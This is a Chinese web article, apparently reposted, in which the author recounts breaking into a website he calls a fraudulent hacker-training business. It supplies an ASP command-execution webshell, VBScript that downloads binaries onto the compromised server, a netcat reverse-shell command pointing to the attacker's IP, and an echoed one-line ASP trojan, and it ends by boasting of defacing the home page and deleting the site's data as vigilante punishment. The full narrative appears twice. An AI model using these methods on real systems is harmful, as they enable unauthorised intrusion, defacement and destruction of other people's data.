入侵骗子站xuehk.com全过程(图)
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
最近在网上老是看到有人说被一个网址为“http://.xuehk.”的黑客培训机构骗了钱,而且骗取的金额数目可不少。于是,抱着为民除 害的心态,准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关于这个网站的资料,得知,这个网站在前不久已经被人黑过了,如果现在还要入 侵的话,成功的几率可能比小,于是就叫上了几个朋友一起搞。
打开“http://.xuehk.”,发现网站的页面几乎都是静态的,如图1所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
整理好思路后,我决定先从主站入手。用阿D和明小子注入工具进行了一次注入点扫面,结果无功而返,但这是我意料之中的事。然后,我变了一下思路,花了10多分钟搜集齐了.xuehk.的所有目录,目录如下
http://.xuehk./
http://.xuehk./book/
http://.xuehk.//
http://.xuehk./pojie/
http://.xuehk./js/
http://.xuehk./xz/
http://.xuehk./zs/
http://.xuehk./shop/
http://.xuehk./yewu/
http://.xuehk./zs/photo/xiao/
http://.xuehk./zs/photo/da/
http://.xuehk./zs/photo/
我分别用网站猎手和明小子注入工具的批量扫描功能对这些目录进行后台扫描,然后我又用我自己加强过的NBSI一个一个的扫,结果依然是无功而返。看来从主 站入手是几乎没可能的了,于是乎开始旁注。打开“http://.114best./ip/”对xuehk进行旁注查询,发现服务器上有很多 网站,很快我就找到了一个有漏洞的网站,如由于服务器安装了比较强的杀软,所以我只拿到了一个一句话webshell,图2所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
把 webshell丢给朋友后,我用lake2的一句话木马客户端查看了一下服务器信息,webshell所在的网站根目录为“F:\root \\root\”,为网站域名的前段,所以,我推测xuehk.的网站根目录为“F:\root\xuehk \root\”,于是我马上尝试跳转到此目录,没有权限。这时我想到asp.的木马权限可能会比asp的高一点,上传好lake2的 asp.一句话木马后却发现服务器不支持asp.。
接着查看了一下终端信息,发现端口被改为了60015。查看了一下第三方软件的信息,结果serv-u路径找不到,而且默认密码改了,服务器上没有安装 PcanyWhere和Radmin,MSSQL和Mysql也没有安装,仔细再找了一下,也没有发现什么可利用的第三方软件,而且服务器的权限设置得很 死,连“开始→程序”都打不开。
上传cmd.asp准备尝试执行命令,但cmd.asp也被服务器的杀毒软件给kill了,于是,自己操刀写了个执行cmd命令的asp脚本,代码如下
")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("")
response.write("")
response.write("
")
response.write("")
%>成功上传到服务器后,执行cmd.asp命令失败。我想可能是管理员删除了cmd.exe,也可能是服务器的权限设置问题,用一句话木马查看服务器服务信 息发现Wscript并没有被禁止,本想用Wscript来执行命令,连一些能写的目录都找不到,常用的everyone目录都不能用,至此,提权陷 入了死局。感觉没什么意思,就跟朋友说了下情况出去玩了。
晚上回来的时候,朋友说找了N个小时,终于找到了一个能写的目录,目录位置是“C:\Program Files\free3web~”,这着实吓了我一跳,一个软件的目录居然能写?打开这个目录看了看,不知道是什么东西,就搁在了一边。准备把cmd上传 到服务器的时候我又发现了一个问题,就是我该如何把二进制文件传上服务器呢?一句话木马只支持文本上传。有的朋友可能说用Wget.vbs来下载,你 想想,我们该怎么执行命令让Wget.vbs去下载文件呢?经过一会儿的思考,我终于想到了一个办法,不能上传,但能下载吧?于是我在网上找到了一个可行 的办法,就是利用Microsoft.XMLHTTP来下载文件到服务器上。我们先把cmd.exe传上自己的网站上(为了减少体积,我用FSG压缩了 cmd.exe!),然后打开一句话木马客户端增强版,填好一句话木马的信息后,把第三个框清空,再把第二个框的代码换成
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","被下载文件的网址",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("保存的文件名"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载成功!")再点击“GO”按钮后,一会儿文件就会被下载到服务器上了,如图3、4所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
上传好cmd.exe后,在我刚才写的cmd.asp脚本的代码中把“cmd.exe”改为“C:\Program Files\free3web~\cmd.exe”,尝试着执行了一下命令,发现执行成功!看来不需要用Wscript来执行命令了,如图5所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
用 dir命令想查看F盘的文件,没有权限,真是郁闷死我了,能执行命令但又没有利用价值,于是我就准备在网上查一些关于服务器提权的文章,看看别人的提 权思路。谁知我无意中看到一篇关于webshell下nc反弹的权限讨论,仔细看过讨论后得知原来用nc反弹回来的shell权限是比webshell权限高的!于是我马上弄了一个我免杀过的nc到服务器上,在本地打开cmd,输入命令“nc -vv -l -p 2006”,然后在webshell中输入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”,一会儿nc就有回应了,我尝试执行命令“ user aa aa /add”,结果失败,证明权限不是system,但当我用命令“dir F:\root\xuehk\root\”的时候,居然成功的列出了xuehk.网站的所有文件,如图6所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
然后我试着用echo命令来在xuehk.写一个文件,输入
echo H4cked by 落叶纷飞>luoye.txt成功写入了xuehk.的网站根目录,如图7所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
现在来echo一个一句话木马吧!输入
echo ^execute request^("l"^)^>luoye.asp成 功写入luoye.asp,但因为服务器屏蔽了asp调试错误的信息,所以打开luoye.asp时返回的页面是500内部错误,这并不影响一句话木 马的使用,我用lake2的一句话木马客户端连接上xuehk.的一句话木马后,用它的“Edit TextFile”功能把xuehk.的首页文件index.asp替换成了黑页,并且在nc反弹回来的shell中将其数据完全删除掉了,也算是 给他们一个小小的教训吧!,这次入侵的目的还是达到了。
打开“http://.xuehk.”,发现网站的页面几乎都是静态的,如图1所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
整理好思路后,我决定先从主站入手。用阿D和明小子注入工具进行了一次注入点扫面,结果无功而返,但这是我意料之中的事。然后,我变了一下思路,花了10多分钟搜集齐了.xuehk.的所有目录,目录如下
http://.xuehk./
http://.xuehk./book/
http://.xuehk.//
http://.xuehk./pojie/
http://.xuehk./js/
http://.xuehk./xz/
http://.xuehk./zs/
http://.xuehk./shop/
http://.xuehk./yewu/
http://.xuehk./zs/photo/xiao/
http://.xuehk./zs/photo/da/
http://.xuehk./zs/photo/
我分别用网站猎手和明小子注入工具的批量扫描功能对这些目录进行后台扫描,然后我又用我自己加强过的NBSI一个一个的扫,结果依然是无功而返。看来从主 站入手是几乎没可能的了,于是乎开始旁注。打开“http://.114best./ip/”对xuehk进行旁注查询,发现服务器上有很多 网站,很快我就找到了一个有漏洞的网站,如由于服务器安装了比较强的杀软,所以我只拿到了一个一句话webshell,图2所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
把 webshell丢给朋友后,我用lake2的一句话木马客户端查看了一下服务器信息,webshell所在的网站根目录为“F:\root \\root\”,为网站域名的前段,所以,我推测xuehk.的网站根目录为“F:\root\xuehk \root\”,于是我马上尝试跳转到此目录,没有权限。这时我想到asp.的木马权限可能会比asp的高一点,上传好lake2的 asp.一句话木马后却发现服务器不支持asp.。
接着查看了一下终端信息,发现端口被改为了60015。查看了一下第三方软件的信息,结果serv-u路径找不到,而且默认密码改了,服务器上没有安装 PcanyWhere和Radmin,MSSQL和Mysql也没有安装,仔细再找了一下,也没有发现什么可利用的第三方软件,而且服务器的权限设置得很 死,连“开始→程序”都打不开。
上传cmd.asp准备尝试执行命令,但cmd.asp也被服务器的杀毒软件给kill了,于是,自己操刀写了个执行cmd命令的asp脚本,代码如下
")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("")
response.write("")
response.write("
")
response.write("")
%>成功上传到服务器后,执行cmd.asp命令失败。我想可能是管理员删除了cmd.exe,也可能是服务器的权限设置问题,用一句话木马查看服务器服务信 息发现Wscript并没有被禁止,本想用Wscript来执行命令,连一些能写的目录都找不到,常用的everyone目录都不能用,至此,提权陷 入了死局。感觉没什么意思,就跟朋友说了下情况出去玩了。
晚上回来的时候,朋友说找了N个小时,终于找到了一个能写的目录,目录位置是“C:\Program Files\free3web~”,这着实吓了我一跳,一个软件的目录居然能写?打开这个目录看了看,不知道是什么东西,就搁在了一边。准备把cmd上传 到服务器的时候我又发现了一个问题,就是我该如何把二进制文件传上服务器呢?一句话木马只支持文本上传。有的朋友可能说用Wget.vbs来下载,你 想想,我们该怎么执行命令让Wget.vbs去下载文件呢?经过一会儿的思考,我终于想到了一个办法,不能上传,但能下载吧?于是我在网上找到了一个可行 的办法,就是利用Microsoft.XMLHTTP来下载文件到服务器上。我们先把cmd.exe传上自己的网站上(为了减少体积,我用FSG压缩了 cmd.exe!),然后打开一句话木马客户端增强版,填好一句话木马的信息后,把第三个框清空,再把第二个框的代码换成
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","被下载文件的网址",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("保存的文件名"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载成功!")再点击“GO”按钮后,一会儿文件就会被下载到服务器上了,如图3、4所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
上传好cmd.exe后,在我刚才写的cmd.asp脚本的代码中把“cmd.exe”改为“C:\Program Files\free3web~\cmd.exe”,尝试着执行了一下命令,发现执行成功!看来不需要用Wscript来执行命令了,如图5所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
用 dir命令想查看F盘的文件,没有权限,真是郁闷死我了,能执行命令但又没有利用价值,于是我就准备在网上查一些关于服务器提权的文章,看看别人的提 权思路。谁知我无意中看到一篇关于webshell下nc反弹的权限讨论,仔细看过讨论后得知原来用nc反弹回来的shell权限是比webshell权限高的!于是我马上弄了一个我免杀过的nc到服务器上,在本地打开cmd,输入命令“nc -vv -l -p 2006”,然后在webshell中输入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”,一会儿nc就有回应了,我尝试执行命令“ user aa aa /add”,结果失败,证明权限不是system,但当我用命令“dir F:\root\xuehk\root\”的时候,居然成功的列出了xuehk.网站的所有文件,如图6所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
然后我试着用echo命令来在xuehk.写一个文件,输入
echo H4cked by 落叶纷飞>luoye.txt成功写入了xuehk.的网站根目录,如图7所示。
500)this.width=500" title="点击这里用新窗口浏览图片" />
现在来echo一个一句话木马吧!输入
echo ^execute request^("l"^)^>luoye.asp成 功写入luoye.asp,但因为服务器屏蔽了asp调试错误的信息,所以打开luoye.asp时返回的页面是500内部错误,这并不影响一句话木 马的使用,我用lake2的一句话木马客户端连接上xuehk.的一句话木马后,用它的“Edit TextFile”功能把xuehk.的首页文件index.asp替换成了黑页,并且在nc反弹回来的shell中将其数据完全删除掉了,也算是 给他们一个小小的教训吧!,这次入侵的目的还是达到了。
上一篇:教你用口令入侵的方法
下一篇:局域网入侵
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座